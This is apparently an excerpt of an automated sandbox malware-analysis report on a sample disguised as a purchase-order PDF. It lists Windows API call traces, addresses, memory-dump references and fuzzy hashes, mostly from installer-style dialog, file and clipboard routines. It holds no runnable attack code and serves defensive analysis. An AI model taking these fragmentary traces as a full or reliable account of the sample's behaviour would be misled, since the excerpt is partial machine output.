                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                            • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                            • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                            • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                            • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2035342205-1173974218
                                                                                                            • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                            • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                            • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                            • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                              • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                            • CreatePopupMenu.USER32 ref: 00405580
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                            • EmptyClipboard.USER32 ref: 0040561B
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                            • CloseClipboard.USER32 ref: 00405676
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                            • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                            • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                            • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                            • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                            • DestroyWindow.USER32 ref: 00403CAE
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 184305955-0
                                                                                                            • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                            • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                            • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                            • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                            • GetSysColor.USER32(?), ref: 00404396
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                            • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                            • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                            • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                            • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: -B@$N$open
                                                                                                            • API String ID: 3615053054-1057335957
                                                                                                            • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                            • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                            • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                            • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                            • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1115850852
                                                                                                            • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                            • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                            • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                            • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                            • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                            • wsprintfA.USER32 ref: 00405DFB
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                            • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                                                            • API String ID: 222337774-899692902
                                                                                                            • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                            • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                            • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                            • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                            • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                            • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                              • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                              • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                              • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                              • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A
